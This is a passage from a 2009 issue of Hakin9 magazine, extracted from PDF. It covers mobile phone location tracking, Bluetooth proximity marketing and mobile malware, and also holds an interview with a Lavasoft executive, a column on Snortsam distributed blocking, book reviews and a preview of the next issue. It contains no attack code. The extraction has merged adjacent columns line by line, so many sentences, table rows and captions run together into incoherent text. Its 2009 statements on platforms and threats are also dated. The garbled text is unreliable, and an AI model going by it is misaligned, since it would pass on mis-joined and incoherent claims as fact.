phone operators were required by the US locating you within the geographic area well do in the not to distant future. In which
FCC to provide location based data within covered by the Wi-Fi hotspot. Google case there is a real possibility Google will
100 meters or less for every mobile phone Latitude is developing a comprehensive know all they need to about the individual.
on their respective networks. The FCC also location based module which will fill the Google Search for mobile is very popular
required that all mobile phone operators void when individuals are hidden from and if you haven’t noticed this also comes
should have the ability to trace mobile GPS coverage. They are not the only with a My Location option. By default this
phone calls. company involved in the tracking industry. is off (this is an opt-in, not double opt-in
The FCC requirements required that More about this in the next section… which is a shame), but if you want to have
all mobile phone operators comply by this on, it will locate your mobile phone
integrating GPS technology into mobile Fact using triangulation. It’s not overly intrusive,
phones, rather than go through an * In the UK, under the Mobile Telephone however if the end-user is unaware of how
expensive refit of the network. In the US (re-programming) Act, changing the IMEI or where there location data might go, it
where GPS development is faster than of a phone, or possessing equipment that might just end up being a privacy issue.
most countries (especially as the US is
the sole operator of the Global Positioning
System that includes 24 satellites and
ground stations that monitor the satellites
that provide all our devices with location
based data) it’s important to point out that
most (obviously this excludes government
agencies, the police and other agencies)
users are not allowed direct access to the
GPS data.
Location determination actually
requires the assistance of a wireless
network and only then can the GPS data
be transmitted. So in theory, you cannot
actually track someone using their
mobile phone, unless that is the individual
has the appropriate mobile phone (i.e.
smartphone), connected to the right Figure 2. PC Malware Trends

6/2009 HAKIN9 71
ID fraud expert says...
A good example of My Location Whisperer, so there is no need to discuss are similar companies who have also
tracking your every step is when a mobile these Bluetooth security issues in this developed similar systems.
user is wandering around a city, just be article. Bluetooth however has other uses. This consists of a number of discreet
pressing update on your mobile phone, One such use is as a Location Based monitoring units (small white boxes on
Google will provide you with search listings Service (LBS) for instance for proximity walls) installed throughout a building/
for local businesses and other relevant marketing. Proximity marketing is evolving, each unit actually calculates the
venues. This is an excellent example of and Bluetooth even with its radius movement of consumers without requiring
how tracking technology helps you find limitations continues to offer advertising the shopper to wear or carry any special
yourself in the digital world. Google has to as well as hacking opportunities, although equipment. The units measure signals
keep people in position to see advertising the latter hasn’t been conclusively proven from the consumer mobile phone using
(and they are not alone in this thinking to date. a unique technology that can locate
either – for obvious financial reasons), so Type in Google Bluetooth advertising a consumer’s position to within 1-2m.
it needs to make sure users use its Web and see what services are being The units then feed this data (25 hours
services anytime, anywhere. offered. Shops and cinemas are favorite a day, 7 days a week) to a processing
locations for using Bluetooth advertising center where the data is audited and
Proximity Marketing LBS technology. When a mobile phone sophisticated statistical analysis is applied
Using Bluetooth is detected the advertising transmitter to create continuously updated information
Bluetooth is a wireless short-range sends out a message asking the on the flow of shoppers in a center or
communication technology which facilitates recipients if they want to view for example passengers moving through an airport.
data transfer between Bluetooth enabled a promotional message. The recipient In the US a company uses a similar
devices. You can connect up to seven has the option to accept the message. technology that can be employed for
Bluetooth devices at any one time, and do However if the recipient does accept they zone-based, push advertising and family/
not need to bother about wires and cables. run the risk of future Bluetooth promotional friend finder applications, which is very
Most mobile smartphones use Bluetooth messages at the same location arriving similar indeed to the example described
as the primary connection medium for on the mobile phone without ever realizing. above from the UK. This particular LBS
backing up daily activities such as email, allows mobile advertisers to dynamically
contacts, tasks, to do lists and so on. Retailers Look to Location define target areas or zones – such
A serial cable is used to backup the Based Services (LBS) as malls or shopping centers – with a
entire the mobile phone (as this normally There is a growing trend towards using geo-fence and then run ad campaigns
includes the operating system) as this Location Based Services (LBS or what by sending messages to subscribers
take a very long time to complete using you might call a mobile tracking service) confined within the geo-zone. Clever stuff
Bluetooth. For the technical individuals within the retail sector. In the US and UK, all round you might say.
among us Bluetooth features low power customers in shopping centers are being There is of course the issue of
consumption, short range (depend on tracked by clever tracking solutions than how accurate these systems are given
power class: 1 meter, 10 meters, 100 listen to signals from a mobile phone. that mobile phones send infrequent
meters) communication. Currently there In the UK technology has been synchronization pulses (normally every
are five versions: Bluetooth 1.0 and 1.0B, developed that allows shopping center 2 hours using what is called a Periodic
Bluetooth 1.1, Bluetooth 1.2, Bluetooth managers and owners, airport and railway Location Update), rather than continuous
2.0, Bluetooth 2.1, and Bluetooth 3.0 is station managers, exhibition centers, art ones. Mobile phones primarily do this to
expected to be released in the near future. galleries and museums to understand the save power and then there is the small
I’m sure readers are familiar with way that customers or passengers flow matter of signal fading which isn’t highlighted
Bluejacking, Bluebugging and Car through their buildings. In the US there much these days when the discussion of
mobile phone tracking emerges.
Table 1. Worldwide Smartphone Sales to End Users in 1Q09 (Thousands of Units)
If the companies who offer the LBS
Company 1Q09 1Q09 Market 1Q08 1Q08 Market have access to mobile phone data through
Sales Share (%) Sales Share (%)
the mobile phone operators, then yes it is
Nokia 14,991.2 41.2 14,588.6 45.1 feasible that even with a unique identifier
Research In Motion 7,233.6 19.9 4,311.8 13.3 (not an IMEI or IMSI) they will indeed be
able to learn a lot about individuals. If you
Apple 3,938.8 10.8 1,725.3 5.3
are worried about someone tracking your
HTC 1,957.3 5.4 1,276.9 4.0 mobile, you might be better switching it off
Fujitsu 1,387.0 3.8 1,317.5 4.1 when you go shopping. Logic suggests (and
surveys prove this) that most individuals
Others 6,896.4 18.8 9,094.8 28.1
(over 80%) have their mobile always on, so
TOTAL 36,404.4 100.0 32,314.9 100.0 we can see why proximity marketing and

72 HAKIN9 6/2009
HOW THE MOBILE PHONE OPENS THE DOOR

potential mobile Cybercriminals want to your login and password details. It appears email client. All three attack vectors will
exploit the opportunity. for now that most Facebook users don’t involve attempting to find ways to steal
believe this is a risk to their identity. Maybe it mobile phone data such as contacts and
Open-source Software isn’t but how do you manage the risk of your sensitive financial data by installing third
Security Threat login and password details falling into the party behavioural monitoring applications,
Open-source is a popular approach, hands of a cybercriminal? The major risk is malware and tracking solutions by sending
especially now that mobile phone if you are paying for third-party software the the user an email with a hyperlink to a
application development is fast moving. software might steal your financial login data website. The user will then be asked to
One particular reason for the popularity as well as install malicious software on your download the third-party application which
of open-source in organizations is that it mobile. Then there is the last security flaw unbeknown to them may contain malware or
has been proven the cut costs. The value which might come about from the phone spyware which monitors every website they
of this development methodology is more being infected and then when the mobile visit, installs malicious malware and monitors
of a marketing opportunity as much as user connects to their PC via either Bluetooth which advertisements users click on.
it is about the design of the software. or USB, it infects that too. There are no Mobile phone operators and software
Open source platforms are provided by instances of this happening yet, but in time developers (this includes third-party
Google (Android), Palm (GNU/Linux), Nokia this attack vector must surely appear. developers as well) did appear to accept
(Maemo) and Apple (iPhone). It is the development of open-source that some level of application control and
The open source model allows much software that may well lead to these security certification would be required, but in the
greater creativity as it differs from the more issues and others yet to be discovered. We past 18 months this now appears to be
corporate centralized development models will not know for some years whether open- less of a case. Google introduced their
that have been used to date. The essence of source software development has opened mobile operating system called Android and
open-source is ‘public collaboration’ which up a whole hornets nest. proceeded to allow developers open source
results with a peer production development access. Nokia appears to be moving in a
of open-source software in particular in the The Mobile similar direction with Maemo (GNU/Linux),
mobile phone software industry. Cybercrime Threat which it currently uses for its Internet Tablets.
The open-source community is Mobile phone malware first appeared in To understand the mobile threat, you
developing very fast these days, in particular June 2004 and it was called Cabir. The would first need to identify the prominent
helped along by mobile phone developers. mobile-phone features at most risk are mobile platform which in this case is
Open-source software development text messaging (using social engineering), currently Symbian, with about 65% of the
however does have potential security contacts list, video and buffer overflows. market share to date. Remember that
risks both for corporations and of course GSM, GPS, Bluetooth, MMS and SMS will Symbian isn’t open-source software, so the
individuals. Too often the open-source indeed be the attack vectors. The malware actual threat of malware attack is relatively
communities that offer their software for free trend from 2003 to 2008 is showing an small. Nokia for example is planning to
don’t appear to be as mindful about security upward trend, but that doesn’t mean the move to an open-source community
practices as their commercial counterparts, malware is actually a real threat to mobile approach with Maemo for OS reasons, so
which charge for software and support. phones (see Graph 1: Mobile Malware expect the threat to Nokia Maemo users
There are those that believe that the open Trends). The important point to note here to develop as time goes by. Open-source
source nature of Linux for example provides is that mobile phones are going to want software application development is one
a primary vehicle for making security to avoid the same security problems of the fastest ‘mobile’ growth areas at the
vulnerabilities easier to identify and fix. The currently plaguing PCs. moment (thanks in part to the iPhone),
main advantage here is that the community The mobile phone feature attack which may also signify a major shift away
can review the source code and make the vector options – Bluetooth requires the for cyber criminals, from attacking PCs to
code more clear which in turn facilitates user to accept the incoming message, attacking mobile smartphones, especially
‘potential’ security best practice. You can so this attack vector is less of a threat (as phones that use open-source software like
decide whether this is the actually the case. highlighted in this section). The GSM and the iPhone, Android and Linux.
The advent of social websites such as GPS risks are predominately associated The Figure 1 (Cience Magazine,
Facebook, MySpace and Twitter has led to a with tracking your mobile movement, using 2009) shows the number of new malware
surge in third-party application development triangulation. Most users currently appear signatures discovered each month on the
for desktop and smartphones. to be either happy or unaware of what Symbian platform from June 2004 (see
Facebook, the fastest growing of these and where data from their mobile phones Cabir) to end of April 2009. Close analysis
social websites allows publishers to develop actually goes. There is also a threat that of the graph and you will notice that a total
third-party applications to improve the spyware might also be installed to collect of just over two hundred different signatures
Facebook experience. Closer inspection of stealthy mobile phone tracking data. have appeared in five years, compared to
most third-party applications and you will The major attack vectors will therefore over 200,000 PC malware pieces per month
not have failed to notice that they all require probably be via SMS, MMS or mobile (Avert Labs Security Trend Report, 2009) (see

6/2009 HAKIN9 73
ID fraud expert says...
Figure 2). So you can clearly see in Graph iTunes App store. Apple retains control over not stay this way indefinitely. The introduction
2 that PC malware is a much greater threat all applications it allows onto it platform. of the Apple iPhone, Palm Pre and Google’s
than the mobile malware threat as it stands Users can only access the App Store and Android operating systems is likely to make
today. Expect this to change in time though. download or purchase apps using iTunes. things much easier for the malware writers
The main point to note from Graph 1 is Developers must also submit apps to mainly due to the introduction of open-
the generally upward trend before March Apple for review and approval before Apple source software development and the lack
2006, when the first phones including the publishes them. There are of course ways of any centralized digital signing process,
Symbian platform security architecture round everything, and Apple developers similar to Symbian.
started shipping (Nokia 3250 and Sony have setup a rival app store called Cydia, Another reason malware and tracking
Ericsson P990i), and the generally downward however iPhone users will have to jailbreak technology solutions (some refer to this
trend after March 2006 as increasing their phone – this process involves hacking as spyware) will propagate is very simple
numbers of phones have platform security the system and circumventing controls put indeed. To date most mobile phone users
included. Most of you will know Symbian has in place by Apple. do not have smartphones. Also of equal
a program called Symbian Signed which importance is that most of these users will
digitally signs applications that meet the Fact indeed migrate to open-source software
approval of Symbian. The Apple App Store passed 1.5 billion platforms in time, as the mobile phone
Symbian uses the services of Finnish downloads, Apple announced July 14, 2009. vendors convert to open source operating
anti-virus vendor F-Secure (also in the As it stands today there isn’t really systems. So you can see the potential
same country as Nokia), in order to scan any real mobile malware, not the same risks for mobile users and of course the
applications for malware. This very system malware threat that resides on PCs. PC financial booty for cybercriminals and
was abused recently (See In Brief) when malware infects a PC silently and stealthily, proximity marketers.
Symbian actually signed programs called whereas mobile malware requires the Another point worth considering is
Sexy View and Sexy Space (both were mobile phone user to confirm that the that Nokia is also moving in the open-
worms) – the publisher used the Express user wants to install it (you can refer to this source software direction with Maemo, so
Signing procedure on Symbian where as a Trojan for example). This malware when Nokia mobile users upgrade (and
most applications are software analyzed, model (which is the only one in circulation Symbian accounts for 49.3% (Gartner
rather than checked by humans to find to date), assumes that the mobile phone (2009)) of the smartphone market Q1
malware was present. doesn’t has any security controls. 2009 – see Table 1 ) to smartphones
In this particular instance the following One of the areas that can be these will be the first users to be exploited,
day the signing was revoked both for propagated is without doubt MMS. There not just by cybercriminals but also by
the content certificate and the publisher is also the growing threat of MMSC proximity marketers. Let’s hope the
certificate. If Symbian mobile users had (settings can be found by visiting http: publishers and mobile phone vendors
downloaded the Sexy applications and //www.nowsms.com/download/mmsop.ini both understand the boundaries and that
the revocation checking was turned on – see settings example below) which could open source development will not be an
then the Symbian installer would not install provide a system control point for any such open mess a few years down the road.
the rogue malware application. Useful to malware spread. If you are reading this Lastly, regarding the marketing
remember! This clearly shows the signing then you will know that most of the network opportunity for proximity marketers,
process does work, but also highlights that operators currently use MMSC filtering to they will also want to find new methods
the Symbian signing authority does indeed stop such a malware threat – however it to generate revenue in a growing
have a gatekeeper with the digital signature could still be a threat, depending on whether smartphone market. One method in
or certificate signing process in place as your network operator filters MMSC. particular that may well prove popular is
well as guarding against publisher abuse Example settings for MMSC: the ability to understand the customer
and the threat of malicious tracking and behaviour in real-time with real-time
malware installation. Operator: ATTWS USA tracking solutions. Historical tracking data
The signing authority not only signs MMS Server URL: http://mmsc.mobile.at is of no use to publishers and marketers,
the applications but it also uses a mobile twireless.net/ so the future is about now and with
phone browser to ensure authenticity of the WAP Gateway IP: 10.250.250.100 tracking technology, especially through
signature or certificate (this doesn’t appear GPRS APN: proxy mobile applications, marketers and
to happen with all Symbian applications Login Name: (not required) publishers will be able to understand the
though). As with the Sexy applications Password: (not required) customers’ real-time behaviour – which to
incident, the certificate and signature was some is quite a scary thought.
revoked, showing that the signing authority Future Trends
does indeed appear to work. The future is the smartphone. To date there
Another company that operates a actually isn’t really a serious mobile killer Julian Evans
Identity Fraud and Information Security Expert – ID Theft
certification process is Apple with the malware threat to smartphones, but it will Protect.

74 HAKIN9 6/2009
INTERVIEW

Interview with
Michael
Helander,
Vice President at
Lavasoft
Michael Helander is a member of the executive team at Lavasoft with responsibilities
for Sales & Marketing as well as overall corporate strategy.

����������������

Could you tell our readers about portal. Our corporate vision also sets Do you think the average user is able to
yourself and your background? us apart. From day one we believed use an anti-spyware program, a firewall
I have been working with international that all computer users, regardless of and other products?
business and economic development geographic location or economic status, If the software publishers do their job
within consumer products, medical and has the right to protect their privacy correctly, computer users of any ability
environmental technology industries for online. Thus, the distribution of the Ad- should easily be able to use Internet
the past18 years, both within the private Aware Free product, providing Internet security products. We are introducing
industry as well as public offices. protection – without the strings. the Simple Mode with our new Ad-Aware
I’ve been with Lavasoft just over 3 version, which gives individual users the
years, my first company within IT, with Could you tell more about your choice to easily toggle between a program
the primary focus of providing quality company solutions? that is designed to take care of everything
security software for computer users of Our flagship product is Ad-Aware, for them, or an Advanced Mode that will
all ages, backgrounds, and geographical which is a full malware fighting tool allow savvy users to customize and control
location. that includes anti-spyware, anti-virus, their security online. They key is to allow the
and anti-rootkit detection and removal user to choose what is best for them.
What separates you from other anti- technologies.
spyware products? Our additional products complement Do you think that these program types
Besides the fact that Lavasoft, as the Internet security as well as the will tend to merge together in the future
original anti-spyware company, comes to performance of your computer, including: and perhaps also become more user
the table with more years of anti-spyware friendly?
experience than our competitors, we also • Lavasoft Registry Tuner, The early stages of security merge are
embody the spirit of the Internet through • Lavasoft Personal Firewall, available in the form of Internet Suite
our community activities – most recently • and the Lavasoft Privacy Toolbox family products, but the future of Internet security
with our new MyLavasoft community of products. continues to evolve every single day,

76 HAKIN9 6/2009
INTERVIEW WITH MICHAEL HELANDER, VICE PRESIDENT AT LAVASOFT

including the shift away from traditional As long as users are committed to their mal-intentioned websites. Still others
software to new emerging distribution forms. protecting themselves, companies like will crack the code and distribute pirate
Lavasoft will be there to support their copies. It’s the nature of the beast, and
Do you think the average user efforts and deliver the technology. certainly one that we combat daily.
understands the benefit to be gained
from using anti-spyware and other How will you communicate the potential What do you perceive as the top threats
security products? benefits to the average user? in 2009 and moving into 2010?
I do believe that a majority of users today We communicate the benefits of Internet Rogue software and rootkits continue to
are educated to the level that even if they security in ways that the average user will climb the charts. Rogue security software
don’t understand the complexities of relate to, by focusing on the benefit from poses as the real deal, only to trick the
Internet security, they at least recognize the types of activities they are involved in computer user into thinking that they have
that they need help to protect against online; shopping, banking, online gaming, viruses or spyware on their machines
online threats. just to name a few. Imagine a cyber thief and that they must purchase the rogue
watching your every move while software in order to clear the threats.
you type on your keyboard while These programs stick like glue, and can
shopping online. It is a scary be tough to get rid of. Likewise rootkits,
prospect, and it involves complex one of the slickest forms of malware
technology. But we are dedicated to hit a machine that have the ability
to making sure that users know to disguise themselves and hide from
why it is important and how to traditional security detection.
best protect themselves.
How do you envision the creation of
How do you feel about the malware world in the future?
possibility users may abuse the I believe that the future will bring us an
software you have created? increasing merge of technology and
Unfortunately it happens every partnerships that will cross traditional
day. Because Ad-Aware is a boundaries.
recognized software program Security companies will partner
worldwide, we regularly have together and with law enforcement and
‘rogue’ attacks against us, where security agencies worldwide to form
others abuse the Ad-Aware name comprehensive approaches to the mass
to trick computer users to click to onslaught of malware distribution.

Which companies are presently using


Protect your Privacy with the World’s Most Trusted your product?
Anti-Malware We’re not at liberty to openly disclose
Every time you go online to check your email, pay a bill, or download a file, you are exposed to all of our corporate customers, but it is
cyber criminals and their relentless attempts to infiltrate your PC to steal your private information. important to note that Ad-Aware is on
With minimal strain on system resources and power-packed advancements to our anti-
the desktops in the office of one of the
malware technology, including advanced Genotype detection technology and a rootkit removal
system, Ad-Aware anti-virus + anti-spyware gives you the power you need to protect your privacy
top United States offices dealing with
and security, so that you can use the Internet how, when, and where you want! security, as well as one of the world’s
The power is in your hands. major insurance firms. But it is also the
plethora of small and medium sized
companies that we get equally excited
Ad-Aware anti-virus + anti-spyware about – everyday companies that are
battling against the crush of Internet
• The Power is in Your Hands security threats.
• The Power to Protect your Privacy
• With 400 Million Downloads, Ad-Aware is The World’s Most Trusted Anti-Malware
Thank you for interview and good luck
• Protect your Privacy with the World’s Most Trusted Anti-Malware
• The Power to Stay Safe Online is in Your Hands with your future plans.
• Core virus and spyware protection trusted by millions worldwide.
• Comprehensive virus and spyware protection trusted by millions worldwide
• Comprehensive malware protection with minimal strain on resources
• Anti-Virus + Anti-Spyware = Complete Anti-Malware Protection
• Get the Peace of Mind of Knowing You’re in Control Online

6/2009 HAKIN9 77
EMERGING THREATS
Viva la Revolucion!
MATTHEW JONKMAN

T
he Open Information Security blocks manually. If you have a signature bank networks are automatically blocking
Foundation has recently been that may false positive now and then you the attacker and thus very rarely see the
formed to create a next generation can make the block time short, 2 minutes attack. The university benefits from the
intrusion detection engine. Not just formed, for example. Thats enough to make an blocking back from all of the banks who
but funded. Well funded. And if you're not attacker or automated scanner timeout generally have more well managed IDS
already aware you'll be encouraged to and move on. But if you by chance block sensors and rulesets. It's good for all.
know who is doing the funding, the US a benign human they'll be back in before There are challenges in this kind of a
Department of Homeland Security. The they even realize something is going on. setup. False positives and whitelisting are
mandate this money came with was a Most blocks are longer than two two major ones. If one site has a bad rule
simple one; Go build a next generation IDS, minutes of course. Twenty four hours or or a string of false positive blocks it can
and make it free for us and the world to use. thirty days are fairly common block times. affect all organizations. Snortsam does
We're very excited about this. The Signatures in place to detect port scanning allow for local whitelisting, and local settings
foundation is off and running with over 15 and SSH Brute forcing I generally have always override the feed. But blocking of
professional programmers from all over block for 24 hours and never see the same popular public sites like Google from a bad
the world feverishly turning out code, and attackers again. Known Russian Business signature cause very apparent issues.
we're still hiring! We've had a brainstorming Network IPs I gladly block for thirty days at This is where I see IP Reputation
session in Washington DC in July, another a time without any issue. Spam detection coming to the rescue. We want to use this
planned soon, and a number of working signatures I block for 15 minutes which same distributed blocking mechanism,
groups getting the specifics ironed out on works very well. The spammer or zombie but using IP Reputation we can make
everything from hardware acceleration to is going to continue to try to send mail and more informed choices. Google networks
config and rules languages. We will have a thus continually set the signature off over for example would have a very positive
production release by December 31, 2009! and over (but not being able to deliver mail), reputation and thus blocks could be
In my previous article here I talked so the time continues to be extended with overridden. IP ranges with very bad
about the uses of IP Reputation. This is one each hit. But once they stop sending the reputations (blocks of known spam
of the core features of the engine that we spam they're unblocked in 15 minutes. outfits for example) would get a very bad
believe will bring a significant step forward The hub and spoke architecture will reputation. The local admin could make
in security and information sharing. I'd like make Snortsam a great asset to a large the local choice to block any IP with a
to talk about a specific aspect of reputation organization. The administrator can have reputation below a certain threshold in the
this month, distributed blocking. one hub (or multiple for redundancy or spam category going to their mail servers.
I've long been a proponent of several sites) block on all ingress and If you're not doing any automated
automated blocking. Snort_inline is one egress points. Each blocking device can blocking I highly recommend you do. Get
way to do this by blocking particular hostile have a filter for only certain snort signatures. Snortsam setup and see what you can
sessions and packets. But my personal For example if you have a dedicated firewall do. Start off blocking on a few signatures
philosophy is more toward blocking for your mail server farm you can skip the and see how it goes. To be clear not all
attackers completely using perimeter blocks for malware Command and Control signatures are blockable. I'd estimate I
devices. I use a tool called Snortsam written servers to keep the firewall ruleset under block on about 20% of the signatures in the
by Frank Knobbe (http://www.snortsam.net). control. Conversely you may want to skip the Emerging Threats and Snort GPL rulesets.
What Snortsam does is allows you to blocks for known spammers on a link that's The vast majority are either not reliable
define a rule as a blocking rule. You run only outbound user traffic. enough or not blockable offenses. But once
a Snortsam hub that takes these blocks To get an even better level of protection you have this infrastructure in place you
from all of your snort sensors and does organizations can band together and can by hand add blocks around your entire
the actual blocking. You can block on the share block data. I've run setups in the past perimeter in less than a second when you're
individual sensor or you can have Snortsam where a group of banks (via a managed in trouble.
talk to your firewall devices or routers to add IDS provider) would share block data with The ways we can use IP Reputation
blocks. What makes Snortsam so effective organizations like universities. The banks are numerous. Stay tuned to the project to
is the timing of a block and the distributed benefit because universities have massive see how this comes out! Http://www.ope
nature of the blocks. numbers of attacks and malware on ninfosecfoundation.org. As always please
Timing allows you to mitigate false generally wide ranges of IP space. As soon send me your thoughts, jonkman@emergi
positives without having to manage the as something happens at the university the ngthreats.net .

78 HAKIN9 6/2009
BOOK REVIEW
The Myths of Security:
What the Computer Security Industry Doesn’t
Want You to Know
This has got to be one of the most There are certain parts of the book that
thought provoking books on IT poke holes through some well known myths
Security that I have read in a long on the Internet, like the one concerning
time. anti-virus companies and the fact that they
John Viega
This book is a collection of essays written write their own viruses (or is it virii?), another O’Reilly Media, Inc.
ISBN-13: 978-0-596-52302-2
about some of the larger problems that are concerning the well known fact that an
264 pages
around in the computer industry. Written in a unpatched machine is only safe for 4 minutes RRP L 22.99
way that allows even complete technophobes on the Internet. (It’s amazing how things like
to understand this subject matter makes this change, I was always told that it was 20
it accessible to all, and not just dedicated minutes not 4 minutes) Hopefully this book will
techie’s it is a very easy book to read, allowing turn your current thinking of this industry and
you to dip into each chapter that you have an its associated products upside down, and will
interest in as there is a wide range of topics cause you to rethink everything you have learnt
covered. From how easy it is to be personally so far.
hacked, to how companies need to focus on There was only one real downside I noticed
programming security into the products from throughout the book and that was the constant
the beginning. reference to McAfee and how good they are,
Throughout the book, the author gives his and this is understandable due to the fact that
own personal opinion on all the topics which the author is the Chief Technical Officer (CTO)
some people will find very controversial, but it of their Saas (Software as a Service) Business
does raise awareness on the areas covered unit, but personally I found it a bit annoying and
and their places in the computer industry. He unneccessary.
even takes on the well established names like
Bruce Schneir and Google, pointing out their by Michael Munt
individual faults.

Blown to Bits
As much as we know about being of the digital world. For instance, a plane flying
anonymous and protecting our over your house does not need airspace
identity on the Internet, it's easy clearance, but in the digital world your ISP
to lose sight of the big picture sometimes. might need clearance for packets that transit
Blown to Bits : Your Life, Liberty and Happiness it's airspace. Is this fair? Does attempting to
after the Digital Explosion by Hal Abelson, regulate this stifle competition? What if the
Ken Ledeen and Harry Lewis is a book that airline industry had done the same in its
Hal Abelson, Ken Ledeen and
attempts to assemble that picture for us infancy? These are valid questions that serve Harry Lewis
and serves as a reminder for how new the to illuminate the challenges facing lawmakers Pearson Education
Print ISBN: 0137135599
technology we're using really is. Readers of this today. This is not a technical book by any 366 pages
magazine could potentially skip the first four stretch, but its authors bring up many valid
chapters, which are dedicated to explaining The points and interesting arguments that stimulate
Internet to the layman, although there are some thought regarding our digital world and how it's
interesting anecdotes within. The chapters changing. An ambitious book considering the
following become more interesting, starting with dynamic nature of its subject matter, hopefully
a light refresher on cryptography. For those of its authors will keep it current as events and
you who know Napster only by name (or even the laws change. In all, it's a worthy read for
worse, its current castrated cousin), you'll get a those of us who sometimes get so deep into
nice history lesson on where the current P2P the trees that we lose sight of that interminable
craze all began. The authors are decidedly anti- forest.
DMCA and they bring up excellent analogies
that stimulate thought regarding the boundaries by Lou Rabon

6/2009 HAKIN9 79
UPCOMING
in the next issue...
Mobile web: privacy keeping
and exploitation methods
Modern technology has produced a rapid
spread of so-called mobile devices, i.e.
mobile phones and handhelds, with which
the use of the Internet and its services
has become very easy and affordable.
Nevertheless, the approach to hacking
begins to depart slightly from the classic
approach that requires a computer or
a laptop with which to connect to the
network, because several attack scenarios
can be made from your phone. Mauro
Gentile will describe what mobile web
means, how to structure a site accessible
from mobile devices, and how to use a
phone as a tool for hacking.

SMS trickery in public File Carving Hardware Keylogger – A


transport News sites are regularly reporting about the Serious Threat
Providing consumers with an easy way fact that confidential or secret information Keyloggers are a serious threat for both
to purchase tickets tends to reduce was compromised. The loss of an USB- companies and individuals. Their goal is
fare dodging...which is why most public stick or device from any kind of government to log all input made by a user and to then
transport companies offer SMS tickets. An agency or financial institute is happening make it available to the attacker. Michael
SMS ticket is a ticket which is ordered via quite frequently. Most of the time, the R. Heinzl will show you what hardware
an SMS at a premium-rate number, and is information was present on the device, keyloggers are, what threats they offer and
then delivered to your phone. Tam Hanna but what if the information was deleted or how they work. He will also present how
will show you that there is no absolutely even better, the device was formatted? After you can protect your company against
secure system. Security is nothing more deletion, formatting and/or repartitioning them and what can be expected in future
than a measure to increase the price of we can use a technique called ‘Carving’. developments.
attacking a system. The more secure a Christiaan Beek will present you the
system is, the more time and money must process of extracting a collection of data
be invested to circumvent it. from a larger data set.

Eavesdropping on VoIP
Every Company has IT staff on a separate
Current information on the dedicated floor. The attack described Have you a good idea for an
Hakin9 Magazine can be by Marc-Andre Meloche is that of an article?
found at: unsecured VOIP implementation and Would you like to become an
how it can be used to gain sensitive author?
http://www.hakin9.org/en information about a network infrastructure
Or our Betatester?
or accounts, and how it could be used to
The editors reserve the right to make content changes get information about senior staff. Just write us an e-mail
(en@hakin9.org).
The next issue goes on sale
in January 2010

82 HAKIN9 6/2009

You might also like